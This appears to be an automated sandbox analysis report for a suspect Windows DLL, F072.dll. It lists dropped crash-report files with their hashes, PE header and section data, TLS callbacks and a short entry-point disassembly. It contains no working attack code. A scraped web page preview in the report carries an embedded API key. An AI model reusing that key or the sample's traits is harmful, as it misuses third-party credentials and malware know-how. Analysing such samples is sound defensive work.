                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>17134</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>.. <Revision>1</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>1033</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>5240</Pid>..
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8240
                                                                    Entropy (8bit):3.6895477595596304
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNiPe67zB6Y6q6ngmfTzSKCprL89bLjsf4+5m:RrlsNi26J6YX6ngmfTzSuLIf4B
                                                                    MD5:D3FFD1D8D70A1A68F0C9EA9A8C76FB5F
                                                                    SHA1:78E54A155DAE18F6768EBDF2A3343D29A4FA71CD
                                                                    SHA-256:A4E64D8FDC3BA36EED6669F3FADAA1806229133DB7901EBD273E6928A3D93350
                                                                    SHA-512:0AAF3D061F82FE4BB7BEABE36A967527E30C4DFB1C0229696F5241F3AE30CD936E948B86D4DB4099C92CC41A048CBCBCF8A7B3CAB6647B752DE4695EB5C3E62B
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>17134</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>.. <Revision>1</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>1033</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>5236</Pid>..
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4626
                                                                    Entropy (8bit):4.451239707467063
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zs6KJgtWI9J1Wgc8sqYjg8fm8M4JCdsNZFTQq+q8/MKV4SrSzd:uITf6YuEgrsqYJJHgqHKDWzd
                                                                    MD5:62C66B351B574D2CBFBB67B481A63B8F
                                                                    SHA1:CEE12EE81A9EE305CA89BBFC7A67D2733D67541E
                                                                    SHA-256:2D984FEC02C7B1048A48DAFCD9A82917FBDC2C5D916EC186271D5A545DFFB429
                                                                    SHA-512:7D32A7DFFD390D5763ED8D6436792BF138C852F5861E5DAB842F739F8CFBF06526CC486D208A2FB21554C50AC735CFD00A3355D7780393BBE017AA23755279F8
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4626
                                                                    Entropy (8bit):4.4535457779439005
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zs6KJgtWI9J1Wgc8sqYj/8fm8M4JCdsNZFvmE+q8/MKNQ4SrSod:uITf6YuEgrsqYIJH1HJDWod
                                                                    MD5:3437785D756624522B0240E8A2C39C9B
                                                                    SHA1:9CB9C7D318CEA29B39761E48F239709B44DB0760
                                                                    SHA-256:7CB093CB2B8468C817BB7A0F326D186B8972E8A4C30C6E3FC99B4DF17C8C06DA
                                                                    SHA-512:6CAEDBE89D80EBCE1D51AC0478464BCFDAF7FD2A4A1C7011AC4C70FE0D87B45141DAFFD31650F70B60825843C98F61C89E77935F5C3B8CAEB01EA10875632377
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Wed May 31 08:59:14 2023, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):39450
                                                                    Entropy (8bit):2.1531100420995837
                                                                    Encrypted:false
                                                                    SSDEEP:192:wPOCZLCQHNwZl7O5SkbUiw++i3KDebKflAAUSZ2en:2neC5Lbi++CKDebqlSSp
                                                                    MD5:C5E17D29856DFC35767A676CF84016D6
                                                                    SHA1:2226CB71032CB6B11C1BF076DE5F3045A80AE422
                                                                    SHA-256:590DAC5484A34824E216529042441ABCA963BFBFB40584A32AB3B6644875EF39
                                                                    SHA-512:0B55FC781C91732FCF0990C834BC639FAD94C48EAE531DDFBC189A96270AFCB63FCB3D8B125DAAFC87509CB967421D8C3392A17E65148A3AC957C92BBA2A34CB
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8244
                                                                    Entropy (8bit):3.692276707994812
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNiPI67zr6YkG6FPgmfTTSKCprt89bPFsfglm:RrlsNig6T6YV6NgmfTTSIPeff
                                                                    MD5:744E4FC73CE2424E1A7692483AD7E452
                                                                    SHA1:2A70A2BD8BB4667E5200C738BF7C9766670F66D9
                                                                    SHA-256:62F8466E1B7AD52F869F215C0F68F0F204BB0858F9E69B618782A28993F4E30D
                                                                    SHA-512:E9781E833BE3C4D3EC7CC0445EB6B7B67108A5A47E4AB33C691680C97C5C4916550703C83ADB807EB9AEEC0D5F4BCDBFBE3C9DDCDED0811AB905A94839E0974D
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>17134</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>.. <Revision>1</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>1033</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>5708</Pid>..
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4626
                                                                    Entropy (8bit):4.453635537014888
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zs6KJgtWI9J1Wgc8sqYje8fm8M4JCdsN9FS+q8/M8i4SrSUd:uITf6YuEgrsqY/JHaHrDWUd
                                                                    MD5:F6BF7F749FEBDF7C91074040214DEFC9
                                                                    SHA1:29C636DDD4AD7B9BE52883AA26BCEC0020DF7DC1
                                                                    SHA-256:F29EA7AF59CEE3A0646E241F9F44061472081D74250B449B50A9E6853F5FA691
                                                                    SHA-512:5A2CCCFB9A95EAA052E422D2346C21B594F581423F9E5F4AA61DA8AF347FF1273BBB6F7EEDFB619A3AD73E2BF202D9EA61C462ACBAF97BCBCE3027871420B7C7
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Wed May 31 08:59:17 2023, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):44710
                                                                    Entropy (8bit):2.079213774155661
                                                                    Encrypted:false
                                                                    SSDEEP:192:v86GYxeIO5Skb0vRqUElyt5MhtoiSLle//zHOX:iP5Lb0pqUEQwwiSsDOX
                                                                    MD5:F7A316A5DD606F44B34C9C2DFD37C52F
                                                                    SHA1:00FEF71008DB10C2A4C92E1953241FA55E211D6C
                                                                    SHA-256:D71279CDB337C4CFFB42D01D1933916E3E366A5CEC960810C46D61EC69DF1A51
                                                                    SHA-512:152E98F6101AFE73423F48A4973EF3FE7FCB8FDA37E74B51A02E5A9834A2243CA1679C9E667A24BAB3C8C235457BFC4D854B9DBBCDAAC8D3D0637E079EC6E347
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Wed May 31 08:59:17 2023, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):43190
                                                                    Entropy (8bit):2.121163250343507
                                                                    Encrypted:false
                                                                    SSDEEP:192:v6HSqGYOrTuO5SkbfP1n5I9j/14atXq/:/Rrl5Lbn9sj/qa8
                                                                    MD5:717039D5BED6AC2140741073F17C6955
                                                                    SHA1:742C0581B19062B5E1606620B0332CFAEEBA7768
                                                                    SHA-256:AC706A4DBD9A33019CE2FC951619C4F27F9043D3649DD93ED97C7394F9DE4D4E
                                                                    SHA-512:50480FE95DF6D48C472CB28C2FE39835C563512E7E01A6E73AFACDB16565AB8F3A7F53E38CC52BFD5AB626BDE16513C01C92B9FC3E47834364415A738662370E
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8238
                                                                    Entropy (8bit):3.6919377532907744
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNigw6iut6YEQH6oVgmfTTSKCpr789bU3sf98m:RrlsNi36Z6YRH6oVgmfTTSeU8fz
                                                                    MD5:F693FBFF828EB8D926E85592657E9A86
                                                                    SHA1:3D25D9728FC1A237729E12971748454391FFC963
                                                                    SHA-256:09B556366919F789D2F702D19B90D6396AA229EC62E75EEFC2D84D1E1DCA3326
                                                                    SHA-512:18E824BB6682ED96431F7F599D1853A2ED31943F6816B45F744AED5A1E49BF19FFF03102FEA4A70C93CE6D063B1665F32FB487B79FF399A65AAF2218AAFCF007
                                                                    Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>4696</Pid>
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4626
                                                                    Entropy (8bit):4.450065698293171
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zs6KJgtWI9J1Wgc8sqYjL8fm8M4JCdsN9FyW+q8/M8PM4SrS9d:uITf6YuEgrsqYUJH6WH+MDW9d
                                                                    MD5:F64E5BE2DC72CF4776D0177799C38614
                                                                    SHA1:056F50C273A53C66900BFAB4953CB5D2B8830347
                                                                    SHA-256:699AD5A6DD693739E075E1A9E77EC43DB1F15142DF384848DFE3A7C6CF9DB4E9
                                                                    SHA-512:29FE514E25CC8CF512CCADE05C1E4D9659F59CFBD359DC1D15A138FAD6156697FD7ABE135438A1E0E5A51BF309C6A85498D391C88FB7C5909B71B1EE1A720DD7
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8238
                                                                    Entropy (8bit):3.6900503215815847
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNiHo6K6YEQZ6oVgmfTzSKCprV89bjxsf9Bm:RrlsNiI6K6YRZ6oVgmfTzSAjqfS
                                                                    MD5:8D3AC99AEBAA386223D0BE0CCA333B3D
                                                                    SHA1:B0336139179E00A4EA682B03352756F9535B0104
                                                                    SHA-256:661224D073EC345AA4DFC54C81A3A124423BA4BA09034149F74DFC236F9E3E22
                                                                    SHA-512:FFFFCF19CE24725AE8E56A0A82EE9387FF5952964E92CB29C61358C16B1A3D54A011FCE34B5F45E71F192B07FACB0B3DD2475C6AC45E789F58BA9BFD412B8862
                                                                    Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>4732</Pid>
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4626
                                                                    Entropy (8bit):4.449631812720434
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zs6KJgtWI9J1Wgc8sqYjLs8fm8M4JCdsNZFur+q8/MKJJ4SrSchd:uITf6YuEgrsqYvRJHyrHUJDW4d
                                                                    MD5:118164DD345DD310D351B30EA875EB39
                                                                    SHA1:0933DC3A6B0A0AC57B6144CD17E96DF3CAF0169A
                                                                    SHA-256:A05EABFF7766F77A2C01E07AFD4DE41CFC6C97C2B9DB53D6C60C5594DDF63139
                                                                    SHA-512:85E0BF8EA0EC65EB91AD5A7F5EE50CC61F80AAF01654093BCF4A9FE540BE62C9FE3A177CCC4FB537D9040D390E97E6AC38B0B5EB190F70BF6FAF5E6C4CB290E3
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2064609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    Process:C:\Windows\SysWOW64\wermgr.exe
                                                                    File Type:HTML document, ASCII text, with very long lines (65212)
                                                                    Category:dropped
                                                                    Size (bytes):149507
                                                                    Entropy (8bit):5.28662942755702
                                                                    Encrypted:false
                                                                    SSDEEP:3072:2DbDv9PpwZW+V6ssCcVwjhrTFJnZV12KfgxmyLjsfqW:EcgvW
                                                                    MD5:8AE3F8E84A72A4D14E4D04A25143D7F8
                                                                    SHA1:564305FB38FCDFB369082CDB94D568B6CDAA58F5
                                                                    SHA-256:C09BE827203DCD4DA4509396F5E38BBA16343CE9B2E3EF1770E8240F38ED0073
                                                                    SHA-512:27AECBF22B846427E74C00240DD0E140CCBF8FF67D5DB258327EBE3F469AE0F9190227BF924028F4F3E4F3A594644BA53ECCAB81FE6E62E32CB8852353A727E4
                                                                    Malicious:false
                                                                    Preview:<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><script>if (typeof window !== "undefined" && typeof window.process === "undefined") {. window.process = window.process || { env: {} };. }</script><script type="env-config">{"clientId":"xfinity-learn-ui","sitecoreApiKey":"{1A57AE5E-AF7C-4A9E-803A-C756E3F23267}","sitecoreApiUrl":"https://jss.xfinity.com/","dictionaryKey":"{5FA0A82E-BBDB-4FBD-A3F4-9C5D07AA6E0E}","uniform":false,"oAuth":{"clientId":"shoplearn-web","endpoint":"https://oauth.xfinity.com"},"endpoints":{"ssmEnv":"https://api.sc.xfinity.com","aiQApiUrl":"https://aiq-prod.codebig2.net","errorRedirectUrl":"https://www.xfinity.com/learn/landing/sorry","cspApiUrl":"https://csp-prod.codebig2.net","dataLayerTimelineApiUrl":"https://bdl43tfhab.execute-api.us-east-1.amazonaws.com/prod/aiq-banner"},"environment":{"name":"PROD"},"appName":"xfinity-lea
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                    Category:dropped
                                                                    Size (bytes):1572864
                                                                    Entropy (8bit):4.344707996596824
                                                                    Encrypted:false
                                                                    SSDEEP:12288:M8odQ/1jG7/qSK5qm+YoORoAiqurRW8i75Y6wBVX63J3D+OIFDywD:zodQ/1jG7/qSK5q3s/
                                                                    MD5:8A4BF0040203A623B1F8AD75BC282CA7
                                                                    SHA1:5C33FDF440CCB695C145C73EE88EE00A522BE8DE
                                                                    SHA-256:B8BE5379A07E6D14486E1C642DFAB62E06FB6E6126AC1E61B28DC9F13D0A7250
                                                                    SHA-512:FA387441E97B12292A06FFADB5895D43F771F7DC8A97A7BFF76DEDC33D9507A4A9A01EC643FF555013DC77663DDBFE7AEEBFA5BE52C03BC2F2240C9104D50916
                                                                    Malicious:false
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                    Category:dropped
                                                                    Size (bytes):24576
                                                                    Entropy (8bit):3.4598446705021955
                                                                    Encrypted:false
                                                                    SSDEEP:384:21pH5+XpnxSw4nhfude3eScNehhfude3eS+:6ZSMw4nhfR3eSuehhfR3eS
                                                                    MD5:CBEA7AD55871A2001B030B4E61C95537
                                                                    SHA1:24BE2836B59F39C05B9B3F836ABB38A6D91B3909
                                                                    SHA-256:30C323EE3A4854EF4E5943EFC29D158624C3E4F970970816BE546B3781827E4B
                                                                    SHA-512:6979C1F1AFD2AA862B01C9E94CD618F1AC7D953DC8B638219A227AC1DCE1C36B46A4A29F1B5F7A9BF5D18278EBF58D61C8F2FB52C2ECD4B6D9CEA49F0468526B
                                                                    Malicious:false
                                                                    File type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                    Entropy (8bit):6.665193018402438
                                                                    TrID:
                                                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                                                    • DOS Executable Generic (2002/1) 0.20%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:F072.dll
                                                                    File size:983328
                                                                    MD5:0f25933ea364d051e10480e68cbf4ae7
                                                                    SHA1:bcc95a67d10b389e7c58159911ceac3ba92bef0b
                                                                    SHA256:f2e4cbb34cd7431ceb5a186fddd3b38736e5e327afff8dff5d87fe4a6a64048f
                                                                    SHA512:067a8089aec626574f3dac7f3b38102671dae4c1121c9b8efa0d38800300275947d9ca73a41233b489672603d4fa099b48785e35e834c907d77d5ee2438d4d22
                                                                    SSDEEP:24576:D7AkdHt+UnNtqbVotX4Dw/9JGCZdBK/+NYouXFPn/yd4X:DZ8RDwlJGoY7XX
                                                                    TLSH:6D258EC0FBD744FAE46718B1B09AB7AFAB3112050138CE76DFA58E09E976B401DDB245
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....0d...........#...'.....................................................0 .....{.....@... .........................hC.
                                                                    Icon Hash:7ae282899bbab082
                                                                    Entrypoint:0x10001390
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x10000000
                                                                    Subsystem:windows cui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x6430AE80 [Sat Apr 8 00:00:00 2023 UTC]
                                                                    TLS Callbacks:0x10090cc0, 0x10090c70, 0x100a1c60
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:ac404a1028e7ce450416867d9b3974cc
                                                                    Instruction
                                                                    sub esp, 0Ch
                                                                    mov dword ptr [101D86FCh], 00000000h
                                                                    mov ecx, dword ptr [esp+18h]
                                                                    mov edx, dword ptr [esp+14h]
                                                                    mov eax, dword ptr [esp+10h]
                                                                    call 00007F80B0BFFD97h
                                                                    add esp, 0Ch
                                                                    retn 000Ch
                                                                    lea esi, dword ptr [esi+00000000h]
                                                                    lea esi, dword ptr [esi+00h]
                                                                    nop
                                                                    sub esp, 1Ch
                                                                    mov eax, dword ptr [esp+20h]
                                                                    mov dword ptr [esp], 100C9000h
                                                                    mov dword ptr [esp+04h], eax
                                                                    call 00007F80B0C9ED2Eh
                                                                    add esp, 1Ch
                                                                    ret
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 18h
                                                                    mov dword ptr [esp], 10001400h
                                                                    call 00007F80B0BFFF13h
                                                                    leave
                                                                    ret
                                                                    lea esi, dword ptr [esi+00000000h]
                                                                    lea esi, dword ptr [esi+00h]
                                                                    nop
                                                                    ret
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    push ebp
                                                                    push edi
                                                                    push esi
                                                                    push ebx
                                                                    mov edx, dword ptr [esp+14h]
                                                                    mov esi, dword ptr [esp+1Ch]
                                                                    mov edi, dword ptr [esp+18h]
                                                                    movzx ebx, dx
                                                                    shr edx, 10h
                                                                    test esi, esi
                                                                    je 00007F80B0BFFFC8h
                                                                    nop
                                                                    cmp esi, 04h
                                                                    jbe 00007F80B0BFFF82h
                                                                    lea esi, dword ptr [esi+00000000h]
                                                                    lea esi, dword ptr [esi+00h]
                                                                    movzx eax, byte ptr [edi]
                                                                    add edi, 04h
                                                                    sub esi, 04h
                                                                    movzx ebp, byte ptr [edi-03h]
                                                                    movzx ecx, byte ptr [edi-02h]
                                                                    add eax, ebx
                                                                    movzx ebx, byte ptr [edi-01h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1da000 | 0x4368 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1df000 | 0x1388 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1e3000 | 0x378 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1e4000 | 0x4128 | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc61e4 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1df328 | 0x2c4 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xab124 | 0xab200 | False | 0.4480831126734843 | data | 6.432110661692397 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0xad000 | 0x100 | 0x200 | False | 0.28125 | Matlab v4 mat-file (little endian) \377\377\377\377 , text, rows 4294967295, columns 4294967295, imaginary | 2.102897197014083 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xae000 | 0x1a624 | 0x1a800 | False | 0.3911224941037736 | data | 5.329684115990636 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss | 0xc9000 | 0x110264 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x1da000 | 0x4368 | 0x4400 | False | 0.4040670955882353 | data | 5.488698281853443 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata | 0x1df000 | 0x1388 | 0x1400 | False | 0.3810546875 | data | 5.386273709762828 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0x1e1000 | 0x30 | 0x200 | False | 0.060546875 | data | 0.25451054171027127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x1e2000 | 0x8 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x1e3000 | 0x1a64e | 0x1b000 | False | 0.9544722945601852 | data | 7.904997942181886 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x1fe000 | 0x4128 | 0x4200 | False | 0.7178030303030303 | data | 6.590473987933104 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
